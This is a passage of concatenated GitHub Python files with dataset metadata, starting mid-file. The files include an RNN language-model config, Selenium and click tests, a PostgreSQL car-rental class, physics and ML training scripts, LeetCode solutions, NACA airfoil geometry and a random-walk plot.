# We take this many minibatches, merge them,\n    # sort the sentences according to their length and create\n    # this many new batches with less padding.\n    state['sort_k_batches'] = 20\n    \n    # Maximum sequence length / trim batches\n    state['seqlen'] = 50\n\n    # Should we use a deep output layer\n    # and maxout on the outputs?\n    state['deep_out'] = True\n    state['maxout_out'] = True\n    \n    state['step_type'] = 'gated'\n    state['rec_activation'] = \"lambda x: T.tanh(x)\"\n\n    # Maximum number of iterations\n    state['max_iters'] = 10\n    state['save_dir'] = './'\n    \n    # ----- TRAINING PROCESS -----\n    # Frequency of training error reports (in number of batches)\n    state['trainFreq'] = 10\n    # Validation frequency\n    state['validFreq'] = 5000\n    # Number of batches to process\n    state['loopIters'] = 3000000\n    # Maximum number of minutes to run\n    state['timeStop'] = 24*60*31\n    # Error level to stop at\n    state['minerr'] = -1\n    return state\n\ndef prototype_test():\n    state = prototype_state()\n\n    state['train_sentences'] = \"tests/data/test.word.train.pkl\"\n    state['valid_sentences'] = \"tests/data/test.word.valid.pkl\"\n    state['dictionary'] = \"tests/data/test.dict.pkl\" \n    state['save_dir'] = \"tests/models/\"\n\n    state['prefix'] = \"test_\"\n    \n    state['deep_out'] = True \n    state['maxout_out'] = False \n\n    #\n    state['qdim'] = 5\n    # Dimensionality of low-rank approximation\n    state['rankdim'] = 5\n    # \n\n    state['bs'] = 10\n    state['seqlen'] = 50\n    return 
state\n","repo_name":"sordonia/rnn-lm","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"11760243061","text":"\"\"\"Тестовое задание\"\"\"\nimport math\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\ndef calc(number):\n \"\"\"Функция для расчета значения по заданию\"\"\"\n return str(math.log(abs(12 * math.sin(int(number)))))\n\n\nLINK = 'http://suninjuly.github.io/get_attribute.html'\n\nbrowser = webdriver.Chrome()\n\ntry:\n browser.get(LINK)\n\n x_element = browser.find_element(By.ID, 'treasure')\n x = x_element.get_attribute('valuex')\n RESULT = calc(x)\n\n text_input = browser.find_element(By.ID, 'answer')\n text_input.send_keys(RESULT)\n\n checkbox = browser.find_element(By.ID, 'robotCheckbox')\n checkbox.click()\n\n radiobutton = browser.find_element(By.CSS_SELECTOR, '[value=\"robots\"]')\n radiobutton.click()\n\n submit_button = browser.find_element(By.CSS_SELECTOR, '[type=\"submit\"]')\n submit_button.click()\nfinally:\n sleep(30)\n browser.quit()\n","repo_name":"osteron/stepik-automation-python-testing","sub_path":"section2/lesson1_step7_checkbox_and_radiobutton.py","file_name":"lesson1_step7_checkbox_and_radiobutton.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35712379661","text":"def get_version_str():\n return \"\\n\".join([\n \"{project} Copyright (C) 2018 Robert Pilstål;\",\n \"This program comes with ABSOLUTELY NO WARRANTY.\",\n \"This is free software, and you are welcome to redistribute it\",\n \"under certain conditions; see supplied General Public License.\"\n ])\n\n\n# Library functions\n\n\n# Main; for callable scripts\ndef main():\n from argparse import ArgumentParser\n from sys import argv, stdin\n parser = ArgumentParser(\n description=\"{one line to give a brief idea of what the program does.}\")\n parser.add_argument(\n \"-a\", action=\"store_true\", default=False, help=\"Prints nothing\")\n parser.add_argument(\n \"-t\", nargs=1, default=[\"nothing\"], metavar=\"TEXT\",\n help=\"What to print\")\n parser.add_argument('-v', '--version', action='version',\n version=get_version_str())\n parser.add_argument(\n \"files\", nargs=\"*\", metavar=\"FILE\", help=\"Files for input\")\n arguments = parser.parse_args(argv[1:])\n files = arguments.files\n # Use stdin if no supplied files\n if len(arguments.files) == 0:\n files = [stdin]\n \n # Set variables here\n \n # Parse STDIN or files\n for f in files:\n infile = f\n # Open for reading if file path specified\n if isinstance(f, str):\n infile = open(f, 'r')\n for line in infile:\n print(line)\n infile.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ropil/stubs_py3","sub_path":"stub_reading_file_or_stdin_gpl.py","file_name":"stub_reading_file_or_stdin_gpl.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70447656514","text":"import psycopg2\nimport lista_de_carros\n\nclass Car:\n def __init__(self, id, marca, modelo, ano, preco_diaria, disponivel=True):\n self.id = id\n self.marca = marca\n self.modelo = modelo\n self.ano = ano\n self.preco_diaria = preco_diaria\n self.disponivel = disponivel\n\n\nclass EmpresaAluguelCarros:\n\n def __init__(self):\n self.conn = psycopg2.connect(\n 
database=\"postgres\",\n user=\"postgres\",\n password=\"mysecret\",\n host=\"localhost\",\n port=\"15432\"\n )\n self.cursor = self.conn.cursor()\n self.criar_tabela()\n self.popular_carros(lista_de_carros.carros)\n\n def criar_tabela(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS carros (\n id SERIAL PRIMARY KEY NOT NULL,\n marca VARCHAR(255),\n modelo VARCHAR(255),\n ano INTEGER,\n placa VARCHAR(7) UNIQUE,\n preco_diaria NUMERIC(10, 2),\n disponivel BOOLEAN\n )\n \"\"\")\n self.conn.commit()\n\n def criar_carro(self, marca, modelo, ano, placa, preco_diaria, disponivel):\n try:\n ano = int(ano)\n except Exception:\n print((\"Ano inválido, tente novamente!\"))\n return\n try:\n preco_diaria = float(preco_diaria)\n except Exception:\n print((\"Preço inválido, tente novamente!\"))\n return\n query = \"INSERT INTO carros (marca, modelo, ano, placa, preco_diaria, disponivel) VALUES (%s, %s, %s, %s, %s, %s)\"\n values = (marca, modelo, ano, placa, preco_diaria, disponivel)\n self.cursor.execute(query, values)\n self.conn.commit()\n\n def popular_carros(self, carros):\n query = \"INSERT INTO carros (marca, modelo, ano, placa, preco_diaria, disponivel) VALUES (%s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING\"\n for carro in carros:\n values = (carro[\"marca\"], carro[\"modelo\"], carro[\"ano\"], carro[\"placa\"], carro[\"preco_diaria\"], carro[\"disponivel\"])\n self.cursor.execute(query, values)\n self.conn.commit()\n\n def listar_carros(self):\n query = \"SELECT * FROM carros\"\n self.cursor.execute(query)\n carros = self.cursor.fetchall()\n return carros\n\n def buscar_carro(self, placa):\n query = \"SELECT * FROM carros WHERE placa = %s\"\n value = (placa,)\n self.cursor.execute(query, value)\n carro = self.cursor.fetchone()\n print(carro)\n\n def atualizar_carro(self, id, marca, modelo, ano, placa, preco_diaria, disponivel):\n try:\n ano = int(ano)\n except Exception:\n print((\"Ano inválido, tente novamente!\"))\n return\n try:\n preco_diaria = float(preco_diaria)\n except Exception:\n print((\"Preço inválido, tente novamente!\"))\n return\n query = \"UPDATE carros SET marca = %s, modelo = %s, ano = %s, placa = %s, preco_diaria = %s, disponivel = %s WHERE id = %s\"\n values = (marca, modelo, ano, placa, preco_diaria, disponivel, id)\n self.cursor.execute(query, values)\n self.conn.commit()\n\n\n def deletar_carro(self, id):\n query = \"DELETE FROM carros WHERE id = %s\"\n value = (id,)\n self.cursor.execute(query, value)\n self.conn.commit()\n","repo_name":"felipe-carvalhedo/aluguel_carros","sub_path":"aluguel_carros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7322146559","text":"#This file prints Sq and S of bipartition as a function of the ratio of hoppings\r\n\r\nimport numpy as np\r\nfrom mpmath import mp\r\n\r\ndef Cij_0(eigvec, Np):\r\n\tCij=eigvec[:,0:Np]*eigvec[:,0:Np].T\r\n\treturn(Cij)\r\n\t\r\ndef FreeFermions(subsystem,C):\r\n\tC=mp.matrix([[C[x,y] for x in subsystem] for y in subsystem])\r\n\tC_eigval=mp.eigh(C, eigvals_only=True)\r\n\tEH_eigval=mp.matrix([mp.log(mp.fdiv(mp.fsub(mp.mpf(1.0),x),x)) for x in C_eigval])\r\n\tS=mp.re(mp.fsum([mp.log(mp.mpf(1.0)+mp.exp(-x))+mp.fdiv(x,mp.exp(x)+mp.mpf(1.0)) for x in EH_eigval]))\r\n\treturn(S)\r\n\r\n\r\n# def FreeFermions(eigvec, subsystem, FermiVector):\r\n\t# r=range(FermiVector)\r\n\t# Cij=mp.matrix([[mp.fsum([eigvec[i,k]*eigvec[j,k] for k in r]) for i in subsystem] for j in 
subsystem])\r\n\t# C_eigval=mp.eigsy(Cij, eigvals_only=True)\r\n\t# EH_eigval=mp.matrix([mp.log(mp.fdiv(mp.fsub(mp.mpf(1.0),x),x)) for x in C_eigval])\r\n\t# S=mp.re(mp.fsum([mp.log(mp.mpf(1.0)+mp.exp(-x))+mp.fdiv(x,mp.exp(x)+mp.mpf(1.0)) for x in EH_eigval]))\r\n\t# return(S)\r\n\t\r\nClosedLoop = False\r\n\r\n#t_vec= np.arange(0.01, 1.5, 0.01)#vector: contains hopping amplitude ratios\t\r\n\r\n#vector of all possible lenghts for the D part\r\nL_vec=[80,96] #input possible lengths of the chain\r\nwindow=4\r\nfor L in L_vec:\r\n\tNp = int(L / 2)\r\n\tl=[int(L/4), int(L/2), int(3*L/4), int(L)]\r\n\tA = list(range(l[0]))\r\n\tB = list(range(l[0],l[1]))\r\n\tD = list(range(l[1],l[2]))\r\n\tC = list(range(l[2],l[3]))\r\n\t\r\n\t\r\n\toutputfile=\"./Sq_function_of_hopping_L=\"+str(L)+\".dat\"#file in which I will write the results\r\n\tf1=open(outputfile,\"w\")\r\n\t\r\n\t \r\n\tpoint1= 1-window/L\r\n\tpoint2= 1+window/L\r\n\tv_vec= np.concatenate((np.linspace(0.01,point1-0.01,20),np.linspace(point1,point2,100),np.linspace(point2+0.01,1.5,20)))\r\n\t\t\t\r\n\tmp.dps=L*4 #sets the digits of the decimal numbers\r\n\t\r\n\tEND = L - 1\r\n\r\n\tif ClosedLoop == True:\r\n\t\tEND = L\r\n\t#buildHamiltonian\r\n\tH=mp.matrix(L)\r\n\r\n\tfor v in v_vec:\r\n\t\tprint(\"Currently working on...\")\r\n\t\tprint(\"L=\"+str(L)) \r\n\t\tprint(v)\r\n\t\tprint(\"................................\")\r\n\t\t#the following cicle takes care of the staggered hopping\r\n\t\tfor i in range(END):\r\n\t\t\tj = (i + 1) % L\r\n\t\t\tif i % 2 == 0:\r\n\t\t\t\tH[i, j] = -v\r\n\t\t\t\tH[j, i] = H[i, j]\r\n\t\t\telif j % 2 == 0:\r\n\t\t\t\tH[i, j] = -1\r\n\t\t\t\tH[j, i] = H[i, j]\r\n\t\t\t\t\t\t\r\n\r\n\t\t#find its eigenvalues and vectors\r\n\t\teigval, eigvec=mp.eigsy(H)\r\n\t\teigval, eigvec=mp.eig_sort(eigval,eigvec)\r\n\t\t\r\n\t\tCij=Cij_0(eigvec, Np)\r\n\t\t\t\r\n\t\t#From now on I will use the Free Fermions technique to calculate the entanglement entropies of the subsistems in units of log2\r\n\t\t\t\r\n\t\t\t\r\n\t\tSB=FreeFermions(B,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\r\n\t\tSAB=FreeFermions(A+B,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\r\n\t\tSBC=FreeFermions(B+C,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\t\t\t\r\n\t\tSABC=FreeFermions(D,Cij)/mp.log(mp.mpf(2.0)) \r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t#In the end I calculate Sqtopo ad proposed by Wen\r\n\t\tSq=(SAB+SBC-SB-SABC)\r\n\r\n\t\tf1.write (\"%.5f,%.40f\\n\" %(v, Sq))#print to file\r\n\r\n\tf1.close()\r\n\r\n","repo_name":"v-vitale/TopoSSH","sub_path":"Figure_2/scaling_even.py","file_name":"scaling_even.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3239272756","text":"from collections import defaultdict\nclass Solution:\n def largestValsFromLabels(self, values: List[int], labels: List[int], num_wanted: int, use_limit: int) -> int:\n # greedy\n used = defaultdict(lambda: 0)\n vl = list(zip(values, labels))\n vl.sort(key=lambda x: -x[0])\n res = 0\n i = 0\n while i < len(vl):\n v, l = vl[i]\n if used[l] != use_limit:\n res += v\n num_wanted -= 1\n used[l] += 1\n if num_wanted == 0:\n return res\n i += 1\n return res","repo_name":"chien-wei/LeetCode","sub_path":"1090_Largest_Values_From_Labels.py","file_name":"1090_Largest_Values_From_Labels.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9875591460","text":"import random\r\nimport os\r\nimport tensorflow as 
tf\r\nimport matplotlib.pyplot as plt\r\nfrom glob import glob\r\nfrom mirnet import mirnet_model\r\nfrom preprocess import get_dataset\r\nfrom keras import optimizers, callbacks\r\n\r\nrandom.seed(10)\r\n\r\n\r\nDATASET_DIR = \"./datasets/lol_dataset\"\r\n\r\nMAX_TRAIN_IMAGES = int(0.8*len(os.listdir(f\"{DATASET_DIR}/our485/high\")))\r\nNUM_EPOCH = 200\r\n\r\n\r\n# Define the Charbonnier loss function\r\ndef charbonnier_loss(y_true, y_pred):\r\n return tf.reduce_mean(tf.sqrt(tf.square(y_true - y_pred) + tf.square(1e-3)))\r\n\r\n\r\n# Define the PSNR metric\r\ndef peak_signal_noise_ratio(y_true, y_pred):\r\n return tf.image.psnr(y_pred, y_true, max_val=255.0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n train_low_light_images = sorted(glob(f\"{DATASET_DIR}/our485/low/*\"))[:MAX_TRAIN_IMAGES]\r\n train_enhanced_images = sorted(glob(f\"{DATASET_DIR}/our485/high/*\"))[:MAX_TRAIN_IMAGES]\r\n\r\n val_low_light_images = sorted(glob(f\"{DATASET_DIR}/our485/low/*\"))[MAX_TRAIN_IMAGES:]\r\n val_enhanced_images = sorted(glob(f\"{DATASET_DIR}/our485/high/*\"))[MAX_TRAIN_IMAGES:]\r\n\r\n test_low_light_images = sorted(glob(f\"{DATASET_DIR}/eval15/low/*\"))\r\n test_enhanced_images = sorted(glob(f\"{DATASET_DIR}/eval15/high/*\"))\r\n\r\n train_dataset = get_dataset(train_low_light_images, train_enhanced_images)\r\n val_dataset = get_dataset(val_low_light_images, val_enhanced_images)\r\n\r\n model = mirnet_model(num_rrg=3, num_mrb=2, channels=64)\r\n\r\n optimizer = optimizers.Adam(learning_rate=1e-4)\r\n\r\n model.compile(\r\n optimizer=optimizer, \r\n loss=charbonnier_loss, \r\n metrics=[peak_signal_noise_ratio],\r\n )\r\n\r\n checkpoint_saver = callbacks.ModelCheckpoint(\r\n \"./checkpoints/mirnet-best_PSNR_{val_peak_signal_noise_ratio:.2f}/\",\r\n monitor=\"val_peak_signal_noise_ratio\",\r\n save_best_only=True,\r\n mode=\"max\",\r\n )\r\n\r\n lr_scheduler = callbacks.ReduceLROnPlateau(\r\n monitor=\"val_peak_signal_noise_ratio\",\r\n factor=0.5,\r\n patience=10,\r\n verbose=1,\r\n min_delta=1e-7,\r\n mode=\"max\",\r\n )\r\n\r\n history = model.fit(\r\n train_dataset,\r\n validation_data=val_dataset,\r\n epochs=NUM_EPOCH,\r\n callbacks=[lr_scheduler, checkpoint_saver],\r\n )\r\n\r\n '''\r\n plt.plot(history.history[\"loss\"], label=\"train_loss\")\r\n plt.plot(history.history[\"val_loss\"], label=\"val_loss\")\r\n plt.xlabel(\"Epochs\")\r\n plt.ylabel(\"Loss\")\r\n plt.title(\"Train and Validation Losses Over Epochs\", fontsize=14)\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n\r\n plt.plot(history.history[\"peak_signal_noise_ratio\"], label=\"train_psnr\")\r\n plt.plot(history.history[\"val_peak_signal_noise_ratio\"], label=\"val_psnr\")\r\n plt.xlabel(\"Epochs\")\r\n plt.ylabel(\"PSNR\")\r\n plt.title(\"Train and Validation PSNR Over Epochs\", fontsize=14)\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n\r\n '''","repo_name":"henryyantq/MIRNet-Keras","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41626651314","text":"import click\r\nimport click.testing\r\nimport markup\r\nimport os\r\nimport pytest\r\nimport tempfile\r\n\r\n\r\ndef test_file_not_found():\r\n runner = click.testing.CliRunner()\r\n result = runner.invoke(markup.cli.compile, ['this_is_a_file.mu'])\r\n assert result.exit_code == 1\r\n assert result.output != ''\r\n\r\n\r\ndef test_file_is_directory():\r\n runner = click.testing.CliRunner()\r\n with 
runner.isolated_filesystem():\r\n os.mkdir(\"folder\")\r\n result = runner.invoke(markup.cli.compile, ['folder'])\r\n assert result.exit_code == 1\r\n assert result.output != ''\r\n\r\n\r\ndef test_multi_file():\r\n runner = click.testing.CliRunner()\r\n with runner.isolated_filesystem():\r\n with open('main.mu', 'w') as f:\r\n f.write('Hello World!')\r\n with open('dual.mu', 'w') as f:\r\n f.write('Hello World2!')\r\n result = runner.invoke(markup.cli.compile, ['main.mu', 'dual.mu'])\r\n assert result.exit_code == 0\r\n assert result.output != ''\r\n","repo_name":"bob16795/markup","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73713449474","text":"import pygame as pygame\nfrom Entorno import Entorno\n\npygame.init() # Inicialización de la librería\nclock = pygame.time.Clock() # Reloj para mantener FPS estable\nwindow = pygame.display.set_mode((1000, 500))\nentorno = Entorno()\n\nwhile True:\n clock.tick(1)\n accion = 0\n entorno.step(accion)\n entorno.render(window)\n pygame.display.update()\n","repo_name":"carlosoliva2000/rocket-racer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615920946","text":"# 105. Construct Binary Tree from Preorder and Inorder Traversal\n# Medium\n# Array, Hash Table, Divide and Conquer, Tree, Binary Tree\n# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal\n\n# Construct a binary tree from the lists in their given order.\n# def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n# Input: preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]\n# Output: [3,9,20,null,null,15,7]\n\nfrom typing import Optional, List\n\nclass TreeNode:\n # Definition for a binary tree node.\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Sorts + Recursion | Time: O(n^2) | Space: O(n)\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n if not inorder:\n return None\n\n index = inorder.index(preorder.pop(0))\n root = TreeNode(inorder[index])\n root.left = self.buildTree(preorder, inorder[:index])\n root.right = self.buildTree(preorder, inorder[index + 1:])\n return root\n\n # Dictionary + Recursion | Time: O(n) | Space: O(n)\n def buildTree(self, preorder, inorder):\n preorder.reverse()\n idx_map = { v:i for i,v in enumerate(inorder) }\n return self.helper(idx_map, preorder, inorder, 0, len(preorder) - 1)\n\n def helper(self, idx_map, preorder, inorder, lower_bound, upper_bound):\n if lower_bound > upper_bound: return None # No nodes left / empty inorder list.\n root_val = preorder.pop()\n root = TreeNode(root_val)\n root.left = self.helper(\n idx_map, preorder, inorder, lower_bound, idx_map[root_val] - 1)\n root.right = self.helper(\n idx_map, preorder, inorder, idx_map[root_val] + 1, upper_bound)\n return root","repo_name":"daviscvance/Practice","sub_path":"Leetcode/Python/binary_trees/medium/105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"16830438578","text":"import datetime\nimport cx_Oracle\nimport pandas as pd\n\n\n#here getting previous income from DB\ndef get_prev_income (supp_id,timescale, all_cust, cust_name,conn):\n cur=conn.cursor()\n outVal=cur.var(cx_Oracle.CURSOR)\n sql=\"\"\" declare\n -- Boolean parameters are translated from/to integers: \n -- 0/1/null <--> false/true/null \n p_all_customers boolean := sys.diutil.int_to_bool(:p_all_customers);\n begin\n als_stat.find_com_income(p_label_timescale => :p_label_timescale,\n p_supplier_id => :p_supplier_id,\n p_all_customers => p_all_customers,\n p_customer_name => :p_customer_name,\n v_res_crs => :v_res_crs);\n end;\"\"\"\n cur.execute(sql,p_label_timescale=timescale,p_supplier_id=supp_id,p_all_customers=all_cust,p_customer_name=cust_name,v_res_crs=outVal)\n res=outVal.getvalue().fetchall()\n return res\n\n\n\n#evaluation of imported file\ndef evaluation(df):\n if df.shape[0] < 5:\n return 0\n elif isinstance(df['date'], datetime.datetime):\n return 0\n\n elif (df['income'].any() ==''):\n return 0\n\n\n\n","repo_name":"agnesvam/Income-Forecast-module","sub_path":"income.py","file_name":"income.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33743305039","text":"b, n = input().split()\nn = int(n)\nbase = 0\n\nfor i in range(len(b)):\n num = b[-1] # 마지막 글자만 추출\n \n if num.isalpha(): # 알파벳인 경우 -55 (A-55 = 10)\n num = ord(num) - 55\n \n # 10진법 변환 (진법 거듭제곱 후 더하기)\n base = base + int(num) * (n ** i)\n b = b[0:len(b)-1]\n\nprint(base)","repo_name":"minhuikim/Algorithm","sub_path":"python/backjoon/2745_base_conversion2.py","file_name":"2745_base_conversion2.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12881028865","text":"import logging\nfrom math import atan, cos, pi, sin, sqrt\nfrom operator import itemgetter\n\nfrom OCC.wrapper.GeomLProp import GeomLProp_CLProps\n\n__all__ = [\"naca4_points\"]\n\n\ndef linspace(start, stop, n):\n \"\"\"Yield ``n`` values between ``start`` and ``stop`` with linear spacing.\n\n :param float start: start value\n :param float stop: end value\n :param int n: number of points\n :rtype: collections.Iterable[float]\n \"\"\"\n step = (stop - start) / (n - 1.)\n current = start\n yield current\n for _ in range(n - 2):\n current += step\n yield current\n yield stop\n\n\ndef cosspace(start, stop, n, theta1=0, theta2=0.5 * pi):\n \"\"\"Yield ``n`` values between ``start`` and ``stop`` with cosine spacing:\n ``|| | | | | |``.\n\n :param float start: start value\n :param float stop: end value\n :param int n: number of points\n :param float theta1: start angle in radians (``0`` by default).\n :param float theta2: end angle in radians (``1/2 * pi`` by default).\n :rtype: collections.Iterable[float]\n \"\"\"\n step_theta = (theta2 - theta1) / (n - 1.)\n dtheta = cos(theta1) - cos(theta2)\n dlength = stop - start\n yield start\n theta = theta1\n for _ in range(n - 2):\n theta += step_theta\n yield start + (cos(theta1) - cos(theta)) / dtheta * dlength\n yield stop\n\n\ndef naca4_points(s, n, sampling=\"linear\", sharp_te=True):\n \"\"\"Return ``n`` xy coordinates for camber, upper and lower lines of a\n NACA 4-digit airfoil. Sampling of xc-coordinates is either ``'linear'``\n (default) or ``'cosine'`` between 0 and 1. Airfoil will be closed by\n default (``sharp_te=True``), but can also be open. 
Usage:\n\n >>> naca4_points(\"0012\", 50)\n ([(0.0, 0.0), ...],\n [(0.0, 0.0), ...],\n [(0.0, 0.0), ...],\n )\n\n :param str s: NACA string, e.g. \"0012\".\n :param int n: number of points per side.\n :param str sampling: \"linear\" or \"cosine\".\n :param bool sharp_te: closed TE or not?\n :returns: (xy_camber, xy_upper, xy_lower)\n :rtype: (list[(float, float)], list[(float, float)], list[(float, float)])\n \"\"\"\n m = int(s[0]) / 100.\n p = int(s[1]) / 10.\n t = int(s[2:4]) / 100.\n\n # do sanity check on inputs\n if m == 0 and p != 0:\n msg = (\"Airfoil with camber (m = 0), should have p = 0. Found p = {}. \"\n \"Forcing p = 0.\")\n logging.warning(msg.format(p))\n p = 0\n elif m != 0 and p == 0:\n msg = \"Maximum camber position can not be 0. Received p = {}.\"\n raise RuntimeError(msg.format(p))\n if t == 0:\n msg = \"Impossible to have zero-thickness airfoil.\"\n raise RuntimeError(msg)\n\n c0 = 0.2969\n c1 = -0.1260\n c2 = -0.3516\n c3 = 0.2843\n if sharp_te:\n c4 = -0.1036\n else:\n c4 = -0.1015\n\n # make x-spacing\n if sampling == \"linear\":\n xgen = linspace(0, 1, n)\n elif sampling == \"cosine\":\n xgen = cosspace(0, 1, n)\n else:\n msg = \"sampling is either 'linear' or 'cosine', not {}\"\n raise RuntimeError(msg.format(repr(sampling)))\n\n lst_c, lst_u, lst_l = [], [], []\n for xc in xgen:\n yt = 5 * t * (c0 * sqrt(xc) +\n c1 * xc +\n c2 * xc ** 2 +\n c3 * xc ** 3 +\n c4 * xc ** 4)\n # zero camber\n if m == 0:\n yc = 0\n xu, yu = xc, yt\n xl, yl = xc, -yt\n else:\n if xc <= p:\n yc = m / p ** 2 * (2 * p * xc - xc ** 2)\n dycdx = 2 * m / p ** 2 * (p - xc)\n else:\n yc = m / (1 - p) ** 2 * ((1 - 2 * p) + 2 * p * xc - xc ** 2)\n dycdx = 2 * m / (1 - p) ** 2 * (p - xc)\n theta = atan(dycdx)\n xu, yu = xc - yt * sin(theta), yc + yt * cos(theta)\n xl, yl = xc + yt * sin(theta), yc - yt * cos(theta)\n lst_c.append((xc, yc))\n lst_u.append((xu, yu))\n lst_l.append((xl, yl))\n return lst_c, lst_u, lst_l\n\n\ndef airfoil_le_parameter(curve, sample=25, sweeps=4, precision=1.0e-7):\n \"\"\"Return parameter of LE point on ``curve``. 
By default, it will do 4\n consecutive ``sweeps`` with a ``sample`` size of 25 to walk to the point\n with maximum curvature.\n\n >>> # some airfoil curve\n >>> airfoil = FittedCure(points=[pt1, pt2, ...])\n >>> airfoil_le_parameter(airfoil)\n 0.5\n\n :param parapy.geom.occ.curve.Curve curve: airfoil curve\n :param int sample: number of sample points per sweep\n :param int sweeps: number of sweeps\n :param float precision: resolution for GeomLProp_CLProps\n :rtype: float\n \"\"\"\n props = GeomLProp_CLProps(curve.Handle_Geom_Curve, 2, precision)\n\n u1, u2 = curve.u1, curve.u2\n\n for _ in range(sweeps):\n lst = []\n for u in linspace(u1, u2, sample):\n props.SetParameter(u)\n r = props.D2().Magnitude()\n lst.append((r, u))\n\n elt = max(lst, key=itemgetter(0))\n idx = lst.index(elt)\n\n if idx == 0 or idx == sample - 1:\n return elt[0]\n\n u1 = lst[idx - 1][1]\n u2 = lst[idx + 1][1]\n\n elt = max(lst, key=itemgetter(0))\n return elt[1]\n","repo_name":"msaezo/KBE","sub_path":"PythonFolder/venv/Lib/site-packages/parapy/lib/avl/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38040593551","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(12)\n\nN_steps = 1000000\nexpected_R = np.sqrt(N_steps)\nrepeats = 5\n\nmax_val = 0\nmin_val = 0\n\nfor i in range(repeats):\n ###################################\n # generate one random walk #\n ###################################\n # a list of 4 directions 0,1,2,3\n dirs = np.random.randint(0, 4, N_steps)\n # a 2D list of steps, empty for now\n steps = np.empty((N_steps, 2))\n # fill the list of steps according to direction\n steps[dirs == 0] = [0, 1] # 0 - right\n steps[dirs == 1] = [0, -1] # 1 - left\n steps[dirs == 2] = [1, 0] # 2 - up\n steps[dirs == 3] = [-1, 0] # 3 - down\n ###################################\n # use cumsum to sum up the individual steps to get current position\n steps = steps.cumsum(axis=0)\n ###################################\n print(\"Final position:\", steps[-1])\n\n\n ###################################\n xs = steps[::, 0]\n ys = steps[::, 1]\n\n ds = np.sqrt(np.power(xs, 2) + np.power(ys, 2))\n\n d = np.max(ds)\n # print(f\"maxX : {np.max(xs)}, maxY: {np.max(ys)}, dist: {round(d, 1)}\")\n\n\n max_x = np.max(xs)\n if max_x > max_val:\n max_val = max_x\n\n max_y = np.max(ys)\n if max_y > max_val:\n max_val = max_y\n\n min_x = np.min(xs)\n if min_x < min_val:\n min_val = min_x\n\n min_y = np.min(ys)\n if min_y < min_val:\n min_val = min_y\n\n # draw only a selection of points, max 5000, to save memory\n skip = N_steps // 5000 + 1\n xs = xs[::skip]\n ys = ys[::skip]\n\n plt.plot(xs, ys, label=f\"maxdist = {round(d, 1)}\")\n\n###################################\n# add a circle with expected distance\ncircle = plt.Circle((0, 0), radius=expected_R, color=\"k\")\nplt.gcf().gca().add_artist(circle)\n# equal axis size\nplt.gcf().gca().set_aspect(\"equal\")\n###################################\n\nplt.title(f\"{repeats} random walks of {N_steps} steps\")\n\nbounds = max([max_val, min_val*-1])\n\nplt.xlim([bounds*-1, bounds])\nplt.ylim([bounds*-1, bounds])\n\nplt.legend(loc=\"upper left\")\n\nplt.savefig(\"uke_13_oppg_8.png\")\nplt.show()\n","repo_name":"gronnmann/INF100","sub_path":"uke13/uke_13_oppg_8.py","file_name":"uke_13_oppg_8.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
